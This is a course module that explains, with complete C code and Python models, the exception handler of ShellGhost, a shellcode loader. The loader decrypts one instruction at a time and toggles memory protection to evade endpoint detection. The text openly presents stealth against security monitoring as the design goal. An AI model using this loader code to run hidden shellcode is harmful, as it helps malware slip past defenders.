Module 6: The VEH Handler Implementation
Line by line through the exception handler that re-encrypts, decrypts, toggles RW/RX, and advances one instruction at a time.
Module Objective
Walk through the VEH handler implementation in detail. This module covers how the handler reads ContextRecord->Rip (already adjusted by the kernel) to locate the breakpoint, re-encrypts the previous instruction, decrypts the current instruction using SystemFunction032, toggles memory protection between RW and RX via VirtualProtect, and resumes execution. All of this happens within a single EXCEPTION_BREAKPOINT handler, with no trap flag and no EXCEPTION_SINGLE_STEP. Every line of the handler is explained.
1. Global State Recap
The VEH handler relies on global state that was initialized before execution began. Here is the complete state structure:
// Global state accessible by the VEH handler
static struct {
PBYTE exec_base; // Base address of execution buffer (toggled between RW and RX)
SIZE_T exec_size; // Size of execution buffer
PBYTE enc_shellcode; // Per-instruction encrypted shellcode
SIZE_T sc_size; // Shellcode size
// Instruction mapping (from ShellGhost_mapping.py)
CRYPT_BYTES_QUOTA *map; // Array of per-instruction RVA + byte count
DWORD num_instr; // Total number of instructions
DWORD current_index; // Current instruction index
// RC4 key for SystemFunction032
BYTE key[16]; // RC4 encryption key
USHORT key_len; // Key length
// Tracking state
INT prev_index; // Index of previously executed instruction (-1 if none)
// SystemFunction032 function pointer
_SystemFunction032 pSystemFunction032;
} g_ctx;
2. Handling EXCEPTION_BREAKPOINT
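When the CPU hits a 0xCC byte in the execution buffer, the handler must: validate the exception, re-encrypt the previous instruction, decrypt the current instruction, toggle memory protection, and resume. All of this happens in a single handler invocation. Note that "re-encrypt" here means overwriting the previous instruction's bytes in the execution buffer with 0xCC; the encrypted copy in enc_shellcode is never modified, so no second RC4 pass is needed.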
LONG CALLBACK GhostVehHandler(PEXCEPTION_POINTERS ep) {
PEXCEPTION_RECORD rec = ep->ExceptionRecord;
PCONTEXT ctx = ep->ContextRecord;
// ---- BREAKPOINT HANDLING ----
if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
DWORD old_protect;
// Step 1: Get the address of the 0xCC byte.
// The kernel (KiDispatchException) already decremented RIP by 1,
// so ContextRecord->Rip points directly at the 0xCC byte.
PBYTE cc_addr = (PBYTE)ctx->Rip;
// Step 2: Validate - is this 0xCC in our execution buffer?
if (cc_addr < g_ctx.exec_base ||
cc_addr >= g_ctx.exec_base + g_ctx.exec_size) {
return EXCEPTION_CONTINUE_SEARCH; // Not ours
}
// Step 3: Toggle memory to RW for writing
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_READWRITE, &old_protect);
// Step 4: Re-encrypt the PREVIOUS instruction (if any)
if (g_ctx.prev_index >= 0) {
CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
// Write 0xCC back over previous instruction's bytes
memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
}
// Step 5: Decrypt the CURRENT instruction
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
// Copy encrypted bytes to execution buffer
memcpy(g_ctx.exec_base + curr->rva,
g_ctx.enc_shellcode + curr->rva, curr->quota);
// Decrypt in place using SystemFunction032 (RC4)
UNICODE_STRING data = {
(USHORT)curr->quota, (USHORT)curr->quota,
(PWSTR)(g_ctx.exec_base + curr->rva) };
UNICODE_STRING key = {
g_ctx.key_len, g_ctx.key_len,
(PWSTR)g_ctx.key };
g_ctx.pSystemFunction032(&data, &key);
// Step 6: Toggle memory to RX for execution
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_EXECUTE_READ, &old_protect);
// Step 7: Update tracking state
g_ctx.prev_index = g_ctx.current_index;
g_ctx.current_index++;
// Rip already points to the decrypted instruction
return EXCEPTION_CONTINUE_EXECUTION;
}
// Not our exception
return EXCEPTION_CONTINUE_SEARCH;
}
Step-by-Step Breakdown
| Step | Operation | Why |
|---|---|---|
| 1 | cc_addr = ctx->Rip | The kernel already decremented RIP by 1 for EXCEPTION_BREAKPOINT. No manual adjustment needed. |
| 2 | Range check against exec_base | Ensures we only process breakpoints from our shellcode buffer, not from debuggers or other code. |
| 3 | VirtualProtect to RW | The page is currently RX (executable). We need RW to write decrypted bytes. |
| 4 | Re-encrypt previous instruction | Writes 0xCC back over the bytes of the previously executed instruction, restoring the "ghost" state. |
| 5 | Decrypt current instruction via SystemFunction032 | Copies encrypted bytes from the data buffer and decrypts them in place using RC4. |
| 6 | VirtualProtect to RX | Toggles the page back to executable (RX) so the CPU can run the decrypted instruction. Avoids the RWX IoC. |
| 7 | Update tracking indices | Records the current instruction as "previous" for the next handler invocation. Advances to the next instruction index. |
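The bookkeeping in steps 4, 5, and 7 can be modeled without any Windows APIs. The following is a minimal Python sketch, not the handler itself: it works on a plain bytearray, leaves out exception dispatch and memory protection entirely, and uses a textbook RC4 routine in place of SystemFunction032. The names rc4, Entry, GhostModel, and the key value are hypothetical and chosen only for illustration.

```python
from dataclasses import dataclass


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4. Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # keystream generation, XORed with the input
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


@dataclass
class Entry:
    """Hypothetical stand-in for one CRYPT_BYTES_QUOTA record."""
    rva: int
    quota: int


class GhostModel:
    """Toy model of the buffer state only; nothing is ever executed."""

    def __init__(self, instructions: list[bytes], key: bytes):
        self.key = key
        self.map: list[Entry] = []
        enc = bytearray()
        for ins in instructions:
            self.map.append(Entry(len(enc), len(ins)))
            enc += rc4(key, ins)  # each instruction is encrypted on its own
        self.enc = bytes(enc)
        self.buf = bytearray(b"\xCC" * len(enc))  # "ghost" state
        self.current_index = 0
        self.prev_index = -1

    def on_breakpoint(self) -> None:
        # Step 4: restore 0xCC over the previously revealed instruction.
        if self.prev_index >= 0:
            p = self.map[self.prev_index]
            self.buf[p.rva:p.rva + p.quota] = b"\xCC" * p.quota
        # Step 5: reveal the current instruction.
        c = self.map[self.current_index]
        self.buf[c.rva:c.rva + c.quota] = rc4(self.key, self.enc[c.rva:c.rva + c.quota])
        # Step 7: update tracking indices.
        self.prev_index = self.current_index
        self.current_index += 1


# mov rbp, rsp / nop / ret
model = GhostModel([b"\x48\x89\xe5", b"\x90", b"\xc3"], b"hypothetical-key")
model.on_breakpoint()
first = bytes(model.buf)   # only the 3-byte mov is in cleartext
model.on_breakpoint()
second = bytes(model.buf)  # the mov is 0xCC again, only the nop is visible
```

The model makes the invariant easy to inspect: after every call to on_breakpoint, at most one instruction's bytes differ from 0xCC.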
3. The One-Exception Model
ShellGhost uses a one-exception-per-instruction model. There is no trap flag usage and no EXCEPTION_SINGLE_STEP handling. The key insight is that after executing a decrypted instruction, the CPU naturally hits the next 0xCC byte in the buffer, which triggers another EXCEPTION_BREAKPOINT. The handler for that next breakpoint re-encrypts the previous instruction before decrypting the current one.
Why No Trap Flag?
Many assume ShellGhost needs the trap flag (TF) to know when an instruction finishes executing. In reality, the 0xCC-filled buffer already provides this signal. When the CPU finishes executing the decrypted instruction and advances to the next byte, it finds another 0xCC and raises EXCEPTION_BREAKPOINT. This breakpoint is the signal that the previous instruction has completed. The result is a clean sequence of EXCEPTION_BREAKPOINT events, one per instruction, with no trap flag and no EXCEPTION_SINGLE_STEP.
Advantage: Simpler and Stealthier
By avoiding the trap flag entirely, ShellGhost avoids several detection vectors that would otherwise apply: hardware performance counters monitoring single-step exceptions, EXCEPTION_SINGLE_STEP event monitoring, and the doubled exception rate that a two-exception model would produce. The one-exception model generates half as many exceptions as a breakpoint+single-step approach.
4. The RIP Adjustment Explained
A common misconception is that the VEH handler must manually subtract 1 from RIP for EXCEPTION_BREAKPOINT. Here is the actual behavior:
Before INT3 executes:
Memory: [0xCC] [0xCC] [0xCC] ...
RIP: 0x1000 (pointing at the first 0xCC)
CPU executes 0xCC (INT3):
CPU internally advances RIP to 0x1001 (past the 1-byte INT3)
Traps to kernel via IDT vector 3
Kernel (KiDispatchException):
For EXCEPTION_BREAKPOINT specifically, the kernel decrements RIP by 1
RIP is set back to 0x1000 before dispatching to user-mode
VEH handler receives:
ContextRecord->Rip = 0x1000 (already adjusted by kernel)
ExceptionAddress = 0x1000 (points to the 0xCC)
No manual RIP adjustment needed!
VEH handler:
Decrypts instruction at 0x1000 (e.g., "48 89 E5" = mov rbp, rsp)
Toggles to RX, returns EXCEPTION_CONTINUE_EXECUTION
CPU resumes at RIP = 0x1000:
Memory: [0x48] [0x89] [0xE5] [0xCC] ...
Executes "mov rbp, rsp" (3 bytes), advances RIP to 0x1003
Hits 0xCC at 0x1003 -> next EXCEPTION_BREAKPOINT
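The address arithmetic in the trace above can be checked with a few lines of Python. This is only a numeric illustration of the values described in the trace; the function names are hypothetical and nothing here interacts with a real exception.

```python
INT3_LEN = 1  # 0xCC is a one-byte instruction


def rip_seen_by_handler(cc_addr: int) -> int:
    """Address the handler finds in ContextRecord->Rip, per the trace above."""
    rip_after_trap = cc_addr + INT3_LEN  # CPU has advanced past the INT3
    return rip_after_trap - 1            # adjustment applied before dispatch


def next_breakpoint(cc_addr: int, instr_len: int) -> int:
    """Where the following 0xCC is hit after the decrypted instruction runs."""
    return rip_seen_by_handler(cc_addr) + instr_len


handler_rip = rip_seen_by_handler(0x1000)   # 0x1000, no manual fix-up needed
following = next_breakpoint(0x1000, 3)      # 0x1003 after the 3-byte mov
```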
The Kernel Does the Work
This kernel-level RIP adjustment is specific to EXCEPTION_BREAKPOINT (0x80000003). The Windows kernel (KiDispatchException) decrements the saved RIP by 1 before dispatching the exception to user-mode handlers. This is a well-known Windows kernel behavior that debuggers rely on. ShellGhost uses ContextRecord->Rip directly, without any subtraction.
5. Per-Instruction Decryption via CRYPT_BYTES_QUOTA
ShellGhost knows exactly how many bytes each instruction occupies because this information was pre-computed by ShellGhost_mapping.py. The handler uses the CRYPT_BYTES_QUOTA struct to decrypt precisely the right number of bytes:
// Decrypt the current instruction using mapping data
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
// Copy encrypted bytes from data buffer to execution buffer
memcpy(g_ctx.exec_base + curr->rva,
g_ctx.enc_shellcode + curr->rva,
curr->quota);
// Decrypt in place using SystemFunction032
UNICODE_STRING data_str = {
(USHORT)curr->quota,
(USHORT)curr->quota,
(PWSTR)(g_ctx.exec_base + curr->rva)
};
UNICODE_STRING key_str = {
g_ctx.key_len, g_ctx.key_len,
(PWSTR)g_ctx.key
};
g_ctx.pSystemFunction032(&data_str, &key_str);
// The exact bytes of this instruction are now decrypted in place
// The handler knows the exact byte count from curr->quota
Precise Decryption Surface
Because the CRYPT_BYTES_QUOTA struct records the exact byte count of each instruction, ShellGhost decrypts exactly the number of bytes needed and nothing more. The decryption surface at any instant is exactly one instruction (1–15 bytes, the x86-64 instruction length range). After the instruction executes and the next breakpoint handler runs, those bytes are overwritten with 0xCC.
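Since the handler trusts the mapping completely, a sanity check on the generated map is a cheap safeguard. The sketch below is a hypothetical helper, not part of ShellGhost_mapping.py. It assumes the map is a list of (rva, quota) pairs ordered by RVA with no gaps between instructions, which is an assumption about the output format rather than something confirmed by the module.

```python
def validate_map(entries: list[tuple[int, int]], sc_size: int) -> int:
    """Check a per-instruction map and return the largest decryption surface.

    Assumes entries are (rva, quota) pairs, sorted and contiguous.
    """
    expected_rva = 0
    for rva, quota in entries:
        if not 1 <= quota <= 15:  # x86-64 instructions are 1 to 15 bytes long
            raise ValueError(f"quota {quota} at rva {rva:#x} is out of range")
        if rva != expected_rva:
            raise ValueError(f"gap or overlap at rva {rva:#x}")
        expected_rva += quota
    if expected_rva != sc_size:
        raise ValueError("map does not cover the whole shellcode")
    return max((quota for _, quota in entries), default=0)


# mov rbp, rsp (3 bytes), nop (1 byte), ret (1 byte)
largest = validate_map([(0, 3), (3, 1), (4, 1)], sc_size=5)
```

The return value is the largest number of bytes that would ever be in cleartext at once for that map.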
6. API Calls from Shellcode
When the shellcode calls a Windows API (e.g., call rax, where rax holds the address of a function in kernel32.dll), execution leaves the execution buffer and the API runs at full native speed. The call pushes the address of the instruction that follows it as the return address, so when the API returns (via ret), execution lands back in the shellcode buffer at the next instruction. That byte is 0xCC, so EXCEPTION_BREAKPOINT fires again and the cycle resumes naturally.
API Calls Are Free
Because ShellGhost uses only EXCEPTION_BREAKPOINT (no trap flag), API calls outside the execution buffer run at full native speed without any exception overhead. The cycle resumes automatically when the API returns and the CPU hits the next 0xCC in the buffer. This is a significant advantage over a trap-flag-based approach, which would generate single-step exceptions through the entire API call chain.
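A rough count shows how large the difference can be. The two functions below are an illustrative model only: the names are hypothetical, the instruction counts are made-up inputs rather than measurements, and the trap-flag figure assumes that single-stepping stays active for every instruction executed inside the API.

```python
def breakpoint_only_exceptions(shellcode_instrs: int, api_instrs: int) -> int:
    """One EXCEPTION_BREAKPOINT per shellcode instruction; API code adds none."""
    return shellcode_instrs  # api_instrs is deliberately unused


def trap_flag_exceptions(shellcode_instrs: int, api_instrs: int) -> int:
    """Breakpoint plus single-step per shellcode instruction, and one
    single-step per instruction executed inside the API (assumption)."""
    return 2 * shellcode_instrs + api_instrs


# Hypothetical workload: 200 shellcode instructions, 50,000 executed in APIs.
one_exception_model = breakpoint_only_exceptions(200, 50_000)  # 200
two_exception_model = trap_flag_exceptions(200, 50_000)        # 50400
```

With no API calls the ratio is the factor of two mentioned in Section 3; once API code dominates the instruction count, the gap is set almost entirely by the API's length.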
7. Complete Handler Assembly
LONG CALLBACK ShellGhostHandler(PEXCEPTION_POINTERS ep) {
PEXCEPTION_RECORD rec = ep->ExceptionRecord;
PCONTEXT ctx = ep->ContextRecord;
DWORD old_protect;
// ======= BREAKPOINT: Re-encrypt prev, decrypt current =======
if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
// Rip already points at the 0xCC (kernel adjusted)
PBYTE cc_addr = (PBYTE)ctx->Rip;
// Boundary check
if (cc_addr < g_ctx.exec_base ||
cc_addr >= g_ctx.exec_base + g_ctx.exec_size)
return EXCEPTION_CONTINUE_SEARCH;
// Toggle to RW for writing
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_READWRITE, &old_protect);
// Re-encrypt previously executed instruction
if (g_ctx.prev_index >= 0) {
CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
}
// Decrypt current instruction via SystemFunction032
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
memcpy(g_ctx.exec_base + curr->rva,
g_ctx.enc_shellcode + curr->rva, curr->quota);
UNICODE_STRING data = {
(USHORT)curr->quota, (USHORT)curr->quota,
(PWSTR)(g_ctx.exec_base + curr->rva) };
UNICODE_STRING key = {
g_ctx.key_len, g_ctx.key_len,
(PWSTR)g_ctx.key };
g_ctx.pSystemFunction032(&data, &key);
// Toggle to RX for execution
VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
PAGE_EXECUTE_READ, &old_protect);
// Advance instruction index
g_ctx.prev_index = g_ctx.current_index;
g_ctx.current_index++;
// Rip already correct, resume execution
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}
Knowledge Check
Q1: Why does the ShellGhost handler NOT subtract 1 from ContextRecord->Rip?
Q2: How does ShellGhost avoid the RWX memory indicator of compromise (IoC)?
Q3: What happens when the shellcode calls a Windows API that lives outside the execution buffer?